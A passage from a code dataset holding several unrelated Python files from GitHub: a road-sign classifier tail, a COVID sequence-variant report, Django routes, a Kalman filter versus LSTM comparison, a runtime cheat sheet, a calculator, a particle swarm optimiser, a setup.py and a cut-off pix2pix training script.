        print('\\nName of predicted road sign: ', result)\n    return result, label\n\n\n# Model file location.\nMODEL_LOCATION = 'models/predict_signs_model_50.pkl'\n# Test image file location.\nIMAGE_LOCATION = 'test_images/1.png'\n# Detected sign names file location.\nRESULTS_LOCATION = 'reference_images/results_en.txt'\n\n\nif __name__ == '__main__':\n    classify(MODEL_LOCATION, IMAGE_LOCATION, RESULTS_LOCATION, True)\n","repo_name":"trbn1/road_signs_recognition","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"4876468559","text":"'''\nShow how the most common sequence forms change over two halves of an interval;\ncan be used to look for rapidly increasing variants\n'''\n## note, this is based on, indeed derived from, pangocommonforms\n## 1/ it shares a lot of the same code. ideally, that common code should\n## be abstracted into a module that this and pangocommonforms could import\n## 2/ there may be vestigial features of pangocommonforms that are still here,\n## but which don't make sense in the context of how common forms change\n\nimport re\nfrom collections import Counter\nimport datetime\nimport argparse\nimport numpy as np\nfrom scipy import stats\n\nimport verbose as v\nfrom hamming import hamming\n\nimport covid\nimport mutant\nimport commonforms as cf\n\ndef getargs():\n    '''get arguments from command line'''\n    ap = argparse.ArgumentParser(description=__doc__)\n    paa = ap.add_argument\n    covid.corona_args(ap)\n    paa(\"--npatterns\",\"-n\",type=int,default=0,\n        help=\"How many of the most common patterns per lineage (0=all)\")\n    paa(\"--mincount\",\"-m\",type=int,default=10,\n        help=\"Show only patterns with at least this many counts\")\n    paa(\"--protein\",default=\"Spike\",\n        help=\"Protein name to be used in the header\")\n    paa(\"--baseline\",default=\"XBB.1.5\",\n        choices=tuple(covid.BASELINE_MSTRINGS),\n        help=\"Use this sequence as baseline for mutation strings\")\n    paa(\"--lineagebaseline\",action=\"store_true\",\n        help=\"Use each lineage's most common form as mstring baseline for that lineage\")\n    paa(\"--bylineage\",action=\"store_true\",default=False,\n        help=\"Partition sequences by pango lineage\")\n    paa(\"--notbylineage\",action=\"store_false\",dest='bylineage',\n        help=\"Do not partition sequences by pango lineages\")\n    paa(\"--verbose\",\"-v\",action=\"count\",default=0,\n        help=\"verbose\")\n    args = ap.parse_args()\n    if args.lineagebaseline:\n        args.baseline = None\n    if args.baseline == 'Wuhan':\n        args.baseline = None\n    return args\n\ndef print_header(args):\n    '''print the header before the table itself'''\n    print(f\"COMMON FORMS CHANGES FOR {args.protein.upper()} \"\n          f\"WITH A GIVEN PANGO LINEAGE DESIGNATION\")\n    print()\n    print(f\"For each lineage, we show the most common forms of {args.protein}, \"\n          \"and we show the forms that are most significantly increasing \"\n          \"or decreasing. \"\n          \"Also shown is the Hamming distance (HD) between each form \"\n          \"and the most common form in that lineage. Deletions relative to \"\n          \"the baseline reference strain are indicated with a dash \"\n          \"(e.g. the two amino acid deletion at positions 156-157 is \"\n          \"indicated with 'E156-,F157-'), \"\n          \"and insertions are denoted by a plus sign \"\n          \"(e.g. an extra T at position 143 is written '+143T'). \"\n          \")\n    print(f\"Abs Differences in later vs early fractions, expressed as percent.\")\n    print(f\"Relative Differences range between -100% and +100%, using formula: \"\n          \"rel = 100*(later-early)/max(later,early) percent.\")\n    print(f\"The p-value associated with increase or decrease is meant to be used only as a rough guide to the significance of the change. Since the computation is based on assumptions (such as independent and unbiased sampling) that may not hold in practice, the p-value should not be taken too literally.\")\n    print(f\"The first line of each lineage section indicates counts \"\n          f\"for the full lineage relative to all the sequences. \"\n          f\"'Lineage Count' in this first line is actually the full sequence count. \"\n          f\"'Form Count' in this first line is actually the full lineage count, \"\n          f\"and 'Form Pct' refers to lineage count relative to full sequence set.\")\n    print()\n\n    count_forms = f\"the {args.npatterns} most common\" if args.npatterns \\\n        else \"all the\"\n    min_count = \\\n        f\" that have at least {args.mincount} counts \" \\\n        \"(but we always show the most common form)\" \\\n        if args.mincount>1 else \"\"\n    print(f\"We show {count_forms} forms{min_count}. \")\n    print()\n    if args.baseline:\n        print(f\"[Note: Mutation strings are relative to baseline {args.baseline}].\")\n    if args.lineagebaseline:\n        print(\"[Note: Mutation strings are relative to the most common variant in each lineage.]\")\n\ndef split_date_range(date_range):\n    '''Split a date range into early and later halves'''\n    ## input date_range tuple can be datetime.date objects or iso-strings\n    ## output is two tuples of datetime.date objects\n    start_date, end_date = tuple(map(covid.date_fromiso,date_range))\n    mid_date = start_date + (end_date - start_date) // 2\n    early_range = (start_date, mid_date)\n    later_range = (mid_date + datetime.timedelta(days=1), end_date)\n    return early_range, later_range\n\ndef split_date_range_bycounts(seqlist):\n    '''Produce two adjacent date ranges, one early and one later,\n    that cover the full range of dates in the input sequence list,\n    with the split chosen so that there is a\n    roughly equal number of sequences in each range\n    '''\n    datelist = [covid.date_from_seqname(s.name) for s in seqlist]\n    datelist = [d for d in datelist if d is not None]\n    datelist = sorted(datelist)\n    start_date = datelist[0]\n    mid_date = datelist[len(datelist)//2]\n    end_date = datelist[-1]\n    early_range = (start_date, mid_date + datetime.timedelta(days=-1))\n    later_range = (mid_date, end_date)\n    return early_range, later_range\n\nPVALMIN = 1e-9\ndef strpval(pval):\n    '''convert p-value into a string of the form, eg \" 2e-4\", or else \"<1e-9\"\n    '''\n    lessmin = \"<\" if pval < PVALMIN else \" \"\n    pval = max([pval,PVALMIN])\n    pval = \"%5.0e\" % (pval,)\n    mantissa,exponent = pval.split('e')\n    pval = '%1de%+1d' % (int(mantissa),int(exponent))\n    return lessmin + pval\n\ndef main(args):\n    '''commonformschange main'''\n\n    if args.baseline and args.lineagebaseline:\n        raise RuntimeError('Cannot have both --baseline and --lineagebaseline')\n    if not args.bylineage and args.lineagebaseline:\n        v.print('Warning: use --bylineage if you also want --lineagebaseline.')\n\n    print_header(args)\n\n    firstseq,seqlist = cf.get_input_sequences(args)\n    mut_manager = mutant.MutationManager(firstseq)\n\n    early,later = split_date_range_bycounts(seqlist)\n    n_early = len(list(covid.filter_by_date(seqlist,*early)))\n    n_later = len(list(covid.filter_by_date(seqlist,*later)))\n\n    last_days = f\" in the last {args.days} days 
from our last update,\"\n last_days = last_days if args.days else \"\"\n (f_date,_),(_,t_date) = early,later\n print(f\"This output is based on {n_early+n_later} sequences sampled{last_days} \"\n f\"from {f_date} to {t_date}\")\n print(f\"This total interval is split into two sub-intervals.\")\n print(f\"Total: {early[0]} to {later[1]} ({n_early+n_later})\")\n print(f\"Early: {early[0]} to {early[1]} ({n_early})\")\n print(f\"Later: {later[0]} to {later[1]} ({n_later})\")\n\n ## Partition seqlist by lineages, separate list for each lineage\n lp = cf.LineagePartition(seqlist)\n base_mut = cf.get_baseline_mutation(args.baseline,mut_manager,lp,args.protein)\n if not args.bylineage:\n ## Re-partition seqlist into one big partition, not by lineage\n lp = cf.LineagePartition(seqlist,bylineage=False)\n\n ## print header for table\n print()\n print(lp.format(\"Pango\"),\n \"Lineage Form Form Counts Fractions \"\n \" Differences\")\n print(lp.format(\"Lineage\"),\n \" Count Count Pct Early/Later Early/Later \"\n \"Abs Relative pval HD [Form as mutation string]\")\n\n table_format = \\\n \"%s %7d %7d %5.1f%% %6d/%-6d %7.5f/%7.5f \"\\\n \"%+6.2f%% %+6.1f%% %s %3d %s %s\"\n\n for lin in lp.lineages:\n\n seqlin = lp.sequences[lin]\n countlin = lp.counts[lin]\n fmtlin = lp.format(lin)\n\n ## First get consensus form\n cons = cf.consensus(seqlin)\n\n ## Partition sequences into early and later\n seqlin_early = list(covid.filter_by_date(seqlin,*early))\n seqlin_later = list(covid.filter_by_date(seqlin,*later))\n ne,nl = len(seqlin_early),len(seqlin_later)\n v.vvprint('early:',ne)\n v.vvprint('later:',nl)\n\n if nl+ne < args.mincount:\n continue\n\n ## Compute pval for the lineage\n if lin != \"N/A\":\n _,pval = stats.fisher_exact([[ne,nl],[n_early-ne,n_later-nl]])\n print()\n rne = ne/n_early if n_early>0 else 0\n rnl = nl/n_later if n_later>0 else 0\n table_line = table_format % \\\n (lp.format(''),n_early+n_later,ne+nl,\n 100*(ne+nl)/(n_early+n_later),\n ne,nl,rne,rnl,\n 100*(rnl-rne),\n 100*(nl*n_early-ne*n_later)/max([nl*n_early,ne*n_later]),\n strpval(pval),\n 0,f\" Full {lin}\",\"lineage\")\n table_line = re.sub(\" \",\"_\",table_line)\n print(table_line)\n\n\n ## Now get most common forms\n cntr_both = Counter(s.seq for s in seqlin)\n top_comm = sorted(cntr_both,key=cntr_both.get,reverse=True)[0]\n lineage_baseline = mut_manager.get_mutation(top_comm)\n cntr_early = Counter(s.seq for s in seqlin_early)\n cntr_later = Counter(s.seq for s in seqlin_later)\n def relative_diff(comm):\n ce,cl = cntr_early[comm],cntr_later[comm]\n #den = cl/nl if cl*ne > ce*nl else ce/ne\n return 100*(cl*ne-ce*nl)/max([cl*ne,ce*nl,1])\n def neg_log_pval(comm,cap=False):\n ce,cl = cntr_early[comm],cntr_later[comm]\n _,pval = stats.fisher_exact([[ce,cl],[n_early-ce,n_later-cl]])\n if cap:\n pval = max([pval,PVALMIN])\n return np.log10(1/pval)\n def form_count(comm):\n ce,cl = cntr_early[comm],cntr_later[comm]\n return ce+cl\n cntrlist = sorted(cntr_both,key=form_count,reverse=True)\n\n if args.npatterns:\n cntrlist = cntrlist[:args.npatterns]\n\n for comm in cntrlist:\n ce,cl = cntr_early[comm],cntr_later[comm]\n if cl+ce < args.mincount:\n continue\n cons_string = \"\"\n if comm == cons:\n cons_string = \"(consensus)\"\n m = mut_manager.get_mutation(comm)\n mstring = m.relative_to(base_mut) if args.baseline else str(m)\n\n if args.lineagebaseline:\n mstring = m.relative_to(lineage_baseline)\n\n h = hamming(top_comm,comm)\n cene = ce/ne if ne>0 else (np.inf if ne>0 else 0)\n clnl = cl/nl if nl>0 else (np.inf if nl>0 else 
0)\n _,pval = stats.fisher_exact([[ce,cl],[n_early-ce,n_later-cl]])\n print(table_format %\n (fmtlin,countlin,ce+cl,\n 100*(ce+cl)/countlin,\n ce,cl,\n cene,clnl,\n 100*(clnl-cene),\n relative_diff(comm),\n strpval(pval),\n h,mstring,cons_string))\n\nif __name__ == \"__main__\":\n\n _args = getargs()\n v.verbosity(_args.verbose)\n main(_args)\n","repo_name":"jt-lanl/cov-voc","sub_path":"commonformschange.py","file_name":"commonformschange.py","file_ext":"py","file_size_in_byte":11225,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1897180583","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index, name='instagram'),\n path('profile/', views.profile_page, name='profile'),\n path('post/', views.post_items, name='post'),\n path('logout/', views.logout_current_user, name='logout'),\n]","repo_name":"John-Kimani/insta_clone","sub_path":"instagram/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41935119060","text":"from robotcar import robotcar\nfrom kalman_filter import kalman_filter\nfrom random import seed, uniform\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport keras\nfrom keras.models import load_model\n\ntraining_size = 100000\nT = 150\n\nlstm = load_model('models/lstm-units500-simrobot-{0}-{1}.h5'.format(training_size, T))\n\n# Create Random Physical Landmarks\nnum_landmarks = 5\nlandmark_range = 300\nlandmarksx = np.empty(num_landmarks)\nlandmarksy = np.empty(num_landmarks)\nseed()\nfor i in range(num_landmarks):\n landmarksx[i] = uniform(-landmark_range,landmark_range)\n landmarksy[i] = uniform(-landmark_range,landmark_range)\n\n\n# Time Period\ntime = 15 # sec\nts = 0.1\nn = int(time/ts)\n\nnum_features = 5 + num_landmarks * 4\n\ne_kf = []\ne_lstm = []\n\nfrom progressbar import ProgressBar\nbar = ProgressBar()\n\nfor sim in bar(range(500)):\n # Initialize Car and Kalman Filter\n robot = robotcar(2, 0.5, num_landmarks, ts=ts)\n kf = kalman_filter(robot)\n\n # Initialize empty arrays for plotting\n t = np.empty(n)\n e = np.empty(n)\n x = np.empty(n)\n y = np.empty(n)\n x_pred = np.empty(n)\n y_pred = np.empty(n)\n x_update = np.empty(n)\n y_update = np.empty(n)\n observation = np.empty((n, num_features))\n\n\n for i in range(n):\n # Create random movement of wheels\n l_wheel = uniform(5, 15)\n r_wheel = uniform(5, 15)\n robot.move_wheels(l_wheel, r_wheel)\n\n # Prediction Step\n kf.predict()\n\n # Add data to plot array\n x_pred[i] = robot.position[0,0]\n y_pred[i] = robot.position[1,0]\n observation[i][0] = robot.left_encoder\n observation[i][1] = robot.right_encoder\n observation[i][2] = robot.x_odom\n observation[i][3] = robot.y_odom\n observation[i][4] = robot.theta_odom\n\n # Update Steps - Perform an update to the current prediction for all landmarks\n for j in range(num_landmarks):\n landmarkx = landmarksx[j]\n landmarky = landmarksy[j]\n kf.update(landmarkx, landmarky, j)\n observation[i][5 + j*4] = robot.range\n observation[i][5 + j*4 + 1] = robot.thetaL\n observation[i][5 + j*4 + 2] = landmarkx\n observation[i][5 + j*4 + 3] = landmarky\n\n # Uncomment to print all position data\n # print \"Run \" + str(i) + \", updated: \\n\" + str(robot.position[0:3, 0])\n # print \"Run \" + str(i) + \", actual: \\n\" + str(robot.positionVector)\n\n # Add data to plot arrays\n x_update[i] = robot.position[0,0]\n y_update[i] = 
robot.position[1,0]\n x[i] = robot.positionVector[0]\n y[i] = robot.positionVector[1]\n t[i] = robot.time\n\n e_kf.append(np.mean(np.sqrt(np.square(x_update - x) + np.square(y_update-y))))\n\n observations = np.array(observation).reshape(1, n, num_features)\n lstm_pred = lstm.predict(observations)[0]\n lstm_pred_x = lstm_pred.T[0]\n lstm_pred_y = lstm_pred.T[1]\n e_lstm.append(np.mean(np.sqrt(np.square(lstm_pred_y - y) + np.square(lstm_pred_x - x))))\n\nprint (\"KF RMS:\")\nprint (\"{0} +- {1}\".format(np.mean(e_kf), np.std(e_kf)))\nprint (\"LSTM RMS:\")\nprint (\"{0} +- {1}\".format(np.mean(e_lstm), np.std(e_lstm)))\n\"\"\"\n\n# Plot map and error\ne = np.sqrt(np.square(x_update - x) + np.square(y_update-y))\nprint (\"Average RMS Error of Position: \" + str(np.mean(e)))\n\nobservations = np.array(observation).reshape(1, n, num_features)\nlstm_pred = lstm.predict(observations)[0]\nlstm_pred_x = lstm_pred.T[0]\nlstm_pred_y = lstm_pred.T[1]\n\ne = np.mean(np.sqrt(np.square(lstm_pred_y - y) + np.square(lstm_pred_x - x)))\nprint (\"Average RMS Error of Position (lstm): {0}\".format(e))\n\"\"\"\n\nplt.figure(1)\nactual, = plt.plot(x, y)\nupdated, = plt.plot(x_update, y_update)\nlstm, = plt.plot(lstm_pred_x, lstm_pred_y)\nlms, = plt.plot(landmarksx, landmarksy, 'o', label=\"Landmarks\")\nplt.figlegend( (actual, updated, lstm, lms), ('Actual Position', 'Updated Position', 'LSTM Predictions', 'Landmarks'), 'lower right')\nplt.title('Map of Actual, Updated, and LSTM Predicted Positions')\nplt.xlabel('x Position')\nplt.ylabel('y Position')\nplt.show()\n\n","repo_name":"allenwang28/NeuralNetworksandKalmanFilters","sub_path":"filters_comparison/run_robot_kf.py","file_name":"run_robot_kf.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"4876468559","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n'''\n\n@File : runtime.py \n@Author : zoujiachen@megvii.com \n@Date : 2020-03-24 11:02 CST(+0800) \n@Brief : \n\n'''\n\n# get python3's function version of print in python2:\nfrom __future__ import print_function\n\n# get dict that contains all variables and functions currently in environment:\nprint( vars())\n\nimport os, sys\n\n# get python version:\nmajor_ver = sys.version_info.major\nminor_ver = sys.version_info.minor\npatch_ver = sys.version_info.micro\n# also:\nmajor_ver = sys.version_info[ 0]\nminor_ver = sys.version_info[ 1]\npatch_ver = sys.version_info[ 2]\n\n# process name & arguments:\n\nfor idx, arg in enumerate( sys.argv):\n print( 'argument #%d: %s' % (idx, arg))\n\n# tell which OS:\nif sys.platform == 'win32':\n print( 'Using Windows.')\nelif sys.platform == 'darwin':\n print( 'Using MacOS')\nelif sys.platform.startswith( 'linux'):\n print( 'Using Linux')\n\n# run shell command:\n\nif os.name != 'posix':\n cmd = 'ver'\nelse:\n cmd = 'uname -a'\nprint( 'Running command: ' + cmd)\nret = os.system( cmd)\nprint( \"returned: %d\" % ( ret))\n\nprint( 'Running command: ' + cmd)\nstream = os.popen( cmd) # or: with os.popen( cmd) as stream\nprint( \"Command Output:\")\nprint( stream.read())\nstream.close()\n\n\n# import from path:\npath = 'strings.py'\nmodule_name = 'strings'\nif sys.version_info.major <= 2:\n import imp\n module = imp.load_source( module_name, path)\nelif sys.version_info.minor <= 4:\n from importlib.machinery import SourceFileLoader\n module = SourceFileLoader( module_name, path).load_module()\nelse:\n import importlib.util\n spec = importlib.util.spec_from_file_location( module_name, 
path)\n module = importlib.util.module_from_spec( spec)\n spec.loader.exec_module( module)\nprint( module.long_string)\n\n# environment:\nos.environ[ 'ABC'] = \"XYZ\" # set env\nprint( 'env: ABC=' + os.environ[ 'ABC']) # get env\nos.putenv( 'ABC', '123') # set env for subprocesses\nprint( 'cur-process : ABC=' + os.environ[ 'ABC'])\nos.system( 'bash -c \"echo sub-process : ABC=$ABC\"')\n\n# End of 'runtime.py' \n\n","repo_name":"alexander-zou/pycheats","sub_path":"runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23907207188","text":"from replit import clear\nfrom art import logo\ndef calc():\n def add(num1,num2):\n result=num1+num2\n return result\n def sub(num1,num2):\n result=num1-num2\n return result\n def mul(num1,num2):\n result=num1*num2\n return result\n def div(num1,num2):\n result=num1/num2\n return result\n def operator():\n operation_sym={\"+\":add,\"-\":sub,\"*\":mul,\"/\":div,}\n for key in operation_sym:\n print(key)\n operation=input(\"Choose what to perform: \")\n operation=operation_sym[operation]\n return operation\n \n print(logo)\n num1=float(input(\"Enter first number: \"))\n num2=float(input(\"Enter second number: \"))\n answer=operator()(num1, num2)\n print(answer)\n yes = True\n if input(\"Type 'Y' to stop the calc and 'N' to continue\").upper() ==\"Y\":\n yes = False\n clear()\n while yes:\n num3=float(input(\"Enter next number: \"))\n answer=operator()(answer, num3)\n print(answer)\n if input(\"Type 'Y' to stop the calc and 'N' to continue: \").upper() ==\"Y\":\n yes = False\n clear()\n calc()\ncalc()\n \n \n","repo_name":"2001abisheik/MyProjects","sub_path":"py project/calculator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4255237270","text":"#! 
/usr/bin/python3\r\nimport numpy as np\r\nfrom numpy.random import Generator, MT19937\r\nimport os\r\nimport sys\r\n\r\n\r\nclass swarm:\r\n\r\n # arguments should take form: \r\n # swarm(int, [[float, float, ...]], \r\n # [[float, float, ...]], [[float, ...]], \r\n # float, int, [[float, ...]], float, \r\n # float, int, func)\r\n def __init__(self, NO_OF_PARTICLES, lbound, ubound,\r\n weights, vlimit, output_size, targets,\r\n T_MOD, E_TOL, maxit, obj_func): \r\n\r\n heightl = np.shape(lbound)[0]\r\n widthl = np.shape(lbound)[1]\r\n heightu = np.shape(ubound)[0]\r\n widthu = np.shape(ubound)[1]\r\n\r\n lbound = np.array(lbound[0])\r\n ubound = np.array(ubound[0])\r\n\r\n self.rng = Generator(MT19937())\r\n\r\n if ((heightl > 1) and (widthl > 1)) \\\r\n or ((heightu > 1) and (widthu > 1)) \\\r\n or (heightu != heightl) \\\r\n or (widthl != widthu):\r\n \r\n print(\"Error lbound and ubound must be 1xN-dimensional \\\r\n arrays with the same length\")\r\n\r\n else:\r\n \r\n if heightl == 1:\r\n lbound = np.vstack(lbound)\r\n \r\n if heightu == 1:\r\n ubound = np.vstack(ubound)\r\n\r\n self.lbound = lbound\r\n self.ubound = ubound\r\n variation = ubound-lbound\r\n\r\n self.M = np.vstack(np.multiply( self.rng.random((np.max([heightl, \r\n widthl]),1)), \r\n variation) + \r\n lbound) \r\n self.V = np.vstack(np.multiply( self.rng.random((np.max([heightl, \r\n widthl]),1)), \r\n vlimit))\r\n\r\n for i in range(2,NO_OF_PARTICLES+1):\r\n \r\n self.M = \\\r\n np.hstack([self.M, \r\n np.vstack(np.multiply( self.rng.random((np.max([heightl, \r\n widthl]),\r\n 1)), \r\n variation) \r\n + lbound)])\r\n self.V = \\\r\n np.hstack([self.V, \r\n np.vstack(np.multiply( self.rng.random((np.max([heightl, \r\n widthl]),\r\n 1)), \r\n vlimit))])\r\n \r\n self.Gb = sys.maxsize*np.ones((np.max([heightl, widthl]),1))\r\n self.F_Gb = sys.maxsize*np.ones((output_size,1))\r\n self.Pb = sys.maxsize*np.ones(np.shape(self.M))\r\n self.F_Pb = sys.maxsize*np.ones((output_size,NO_OF_PARTICLES))\r\n self.weights = np.vstack(np.array(weights))\r\n self.targets = np.vstack(np.array(targets))\r\n self.T_MOD = T_MOD\r\n self.maxit = maxit\r\n self.E_TOL = E_TOL\r\n self.obj_func = obj_func\r\n self.iter = 0\r\n self.delta_t = np.linalg.norm(self.M)/T_MOD\r\n self.current_particle = 0\r\n self.number_of_particles = NO_OF_PARTICLES\r\n self.allow_update = 0\r\n self.Flist = []\r\n self.Fvals = []\r\n \r\n\r\n def call_objective(self,allow_update):\r\n self.Fvals = self.obj_func(np.vstack(self.M[:,self.current_particle]))\r\n if allow_update:\r\n self.Flist = abs(self.targets - self.Fvals)\r\n self.iter = self.iter + 1\r\n self.allow_update = 1\r\n else:\r\n self.allow_update = 0 \r\n \r\n def update_velocity(self,particle):\r\n\r\n for i in range(0,np.shape(self.V)[0]):\r\n self.V[i,particle] = \\\r\n self.weights[0][0]* self.rng.random()*self.V[i,particle] \\\r\n + self.weights[0][1]* self.rng.random() \\\r\n * (self.Pb[i,particle]-self.M[i,particle]) \\\r\n + self.weights[0][2]* self.rng.random() \\\r\n * (self.Gb[i]-self.M[i,particle])\r\n \r\n \r\n def cull_and_spawn(self,particle):\r\n\r\n update = 0\r\n for i in range(0,(np.shape(self.M)[0])):\r\n if (self.lbound[i] > self.M[i,particle]) \\\r\n or (self.ubound[i] < self.M[i,particle]):\r\n update = 1\r\n\r\n if update:\r\n variation = self.ubound-self.lbound\r\n self.M[:,particle] = \\\r\n np.squeeze( self.rng.random() * \r\n np.multiply(np.ones((np.shape(self.M)[0],1)),\r\n variation) + self.lbound)\r\n\r\n def check_global_local(self,Flist,particle):\r\n\r\n if 
np.linalg.norm(Flist) < np.linalg.norm(self.F_Gb):\r\n self.F_Gb = Flist\r\n self.Gb = np.vstack(np.array(self.M[:,particle]))\r\n \r\n if np.linalg.norm(Flist) < np.linalg.norm(self.F_Pb[:,particle]):\r\n self.F_Pb[:,particle] = np.squeeze(Flist)\r\n self.Pb[:,particle] = self.M[:,particle]\r\n \r\n def update_point(self,particle):\r\n self.M[:,particle] = self.M[:,particle] + self.delta_t*self.V[:,particle]\r\n\r\n def update_delta_t(self):\r\n self.delta_t = np.linalg.norm(self.M)/self.T_MOD\r\n\r\n def converged(self):\r\n convergence = np.linalg.norm(self.F_Gb) < self.E_TOL\r\n return convergence\r\n \r\n def maxed(self):\r\n max_iter = self.iter > self.maxit\r\n return max_iter\r\n \r\n def complete(self):\r\n done = self.converged() or self.maxed()\r\n return done\r\n \r\n def step(self, suppress_output):\r\n if self.allow_update:\r\n self.check_global_local(self.Flist,self.current_particle)\r\n self.update_velocity(self.current_particle)\r\n self.update_point(self.current_particle)\r\n self.cull_and_spawn(self.current_particle)\r\n self.current_particle = self.current_particle + 1\r\n if self.current_particle == self.number_of_particles:\r\n self.current_particle = 0\r\n self.update_delta_t()\r\n if self.complete() and not suppress_output:\r\n print(\"Points:\")\r\n print(self.Gb)\r\n print(\"Iterations:\")\r\n print(self.iter)\r\n print(\"Flist:\")\r\n print(self.F_Gb)\r\n print(\"Norm Flist:\")\r\n print(np.linalg.norm(self.F_Gb))\r\n\r\n def export_swarm(self):\r\n swarm_export = {'lbound': self.lbound,\r\n 'ubound': self.ubound,\r\n 'M': self.M,\r\n 'V': self.V,\r\n 'Gb': self.Gb,\r\n 'F_Gb': self.F_Gb,\r\n 'Pb': self.Pb,\r\n 'F_Pb': self.F_Pb,\r\n 'weights': self.weights,\r\n 'targets': self.targets,\r\n 'T_MOD': self.T_MOD,\r\n 'maxit': self.maxit,\r\n 'E_TOL': self.E_TOL,\r\n 'iter': self.iter,\r\n 'delta_t': self.delta_t,\r\n 'current_particle': self.current_particle,\r\n 'number_of_particles': self.number_of_particles,\r\n 'allow_update': self.allow_update,\r\n 'Flist': self.Flist,\r\n 'Fvals': self.Fvals}\r\n \r\n return swarm_export\r\n\r\n def import_swarm(self, swarm_export, obj_func):\r\n self.lbound = swarm_export['lbound'] \r\n self.ubound = swarm_export['ubound'] \r\n self.M = swarm_export['M'] \r\n self.V = swarm_export['V'] \r\n self.Gb = swarm_export['Gb'] \r\n self.F_Gb = swarm_export['F_Gb'] \r\n self.Pb = swarm_export['Pb'] \r\n self.F_Pb = swarm_export['F_Pb'] \r\n self.weights = swarm_export['weights'] \r\n self.targets = swarm_export['targets'] \r\n self.T_MOD = swarm_export['T_MOD'] \r\n self.maxit = swarm_export['maxit'] \r\n self.E_TOL = swarm_export['E_TOL'] \r\n self.iter = swarm_export['iter'] \r\n self.delta_t = swarm_export['delta_t'] \r\n self.current_particle = swarm_export['current_particle'] \r\n self.number_of_particles = swarm_export['number_of_particles'] \r\n self.allow_update = swarm_export['allow_update'] \r\n self.Flist = swarm_export['Flist'] \r\n self.Fvals = swarm_export['Fvals']\r\n self.obj_func = obj_func \r\n\r\n \r\n\r\n ","repo_name":"jonathan46000/pso_python","sub_path":"particle_swarm.py","file_name":"particle_swarm.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44737087557","text":"from setuptools import setup, find_packages\n\ninstall_requires = [\n 'python-dateutil>=2.4.2,<3.0.0',\n 'PyGithub>=1.26.0,<2.0.0',\n]\n\nsetup(\n name='lgtm',\n version='0.0.14',\n packages=find_packages(exclude=['tests', 'lgtm/tests']),\n 
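# the version ranges in install_requires (declared at the top of this file) cap each dependency below its next major release\n 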
install_requires=install_requires,\n include_package_data=True,\n author='Chase Seibert',\n author_email='cseibert@nerdwallet.com',\n license='Other/Proprietary License',\n description='A pull request approval system using GitHub protected branches and OWNERS files.',\n long_description='',\n url='https://github.com/nerdwallet/github-lgtm',\n entry_points={\n 'console_scripts': ['lgtm=lgtm.console:main'],\n },\n)\n","repo_name":"NerdWalletOSS/github-lgtm","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"21415691456","text":"import torch\nfrom utils import save_checkpoint, load_checkpoint, Plotter\nimport torch.nn as nn\nimport torch.optim as optim\nfrom generator import Generator\nfrom discriminator import Discriminator\nfrom torch.utils.data import DataLoader\nfrom torchmetrics import Accuracy\nfrom tqdm import tqdm\nimport torchvision\nfrom dataset import ImageDataset\n\nDATASET = \"maps\"\n\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nTRAIN_DIR = f\"data/{DATASET}/train\"\nVAL_DIR = f\"data/{DATASET}/val\"\nLEARNING_RATE = 2e-4\nBATCH_SIZE = 16\nNUM_WORKERS = 2\nIMAGE_SIZE = 256\nCHANNELS_IMG = 3\nL1_LAMBDA = 100\nLAMBDA_GP = 10\nNUM_EPOCHS = 200\nLOAD_MODEL = False\nSAVE_MODEL = False\nCHECKPOINT_DISC = \"disc.pth.tar\"\nCHECKPOINT_GEN = \"gen.pth.tar\"\n\naccuracy = Accuracy(task=\"binary\").to(DEVICE)\n\ndef train_fn(epoch, loader, dis, gen, opt_dis, opt_gen, loss_fn_1, loss_fn_2):\n loop = tqdm(loader)\n train_loss, train_acc = 0, 0\n gen.train(), dis.train()\n for batch_idx, (data, targets) in enumerate(loop):\n data = data.to(device=DEVICE)\n targets = targets.to(device=DEVICE) \n # train discriminator\n gen_fake = gen(data)\n dis_real = dis(data, targets)\n dis_fake = dis(data, gen_fake.detach())\n dis_real_loss = loss_fn_1(dis_real, torch.ones_like(dis_real))\n dis_fake_loss = loss_fn_1(dis_fake, torch.zeros_like(dis_fake))\n loss_dis = (dis_real_loss + dis_fake_loss) / 2\n opt_dis.zero_grad()\n loss_dis.backward()\n opt_dis.step()\n\n # train generator\n dis_fake = dis(data, gen_fake)\n loss_gen = loss_fn_1(dis_fake, torch.ones_like(dis_fake))\n loss_l1 = loss_fn_2(gen_fake, targets) * L1_LAMBDA\n loss_gen += loss_l1\n opt_gen.zero_grad()\n loss_gen.backward()\n opt_gen.step()\n train_loss += (loss_dis.item() + loss_gen.item())/2\n return train_loss / len(loader)\n\n\ndef valid_fn(epoch, loader, gen, loss_fn, folder=f\"data/{DATASET}/saved_images/\"):\n # run the generator over the validation set, periodically saving sample images\n loop = tqdm(loader)\n val_loss, val_acc = 0, 0\n gen.eval()\n with torch.inference_mode():\n for batch_idx, (data, targets) in enumerate(loop):\n data = data.to(device=DEVICE)\n targets = targets.to(device=DEVICE) \n # forward\n predictions = gen(data)\n loss = loss_fn(predictions, targets)\n predictions = predictions * 0.5 + 0.5 # remove normalization\n val_loss += loss.item()\n if batch_idx % max(1, len(loader) // 10) == 0: # guard against loaders with fewer than 10 batches\n torchvision.utils.save_image(predictions, folder + 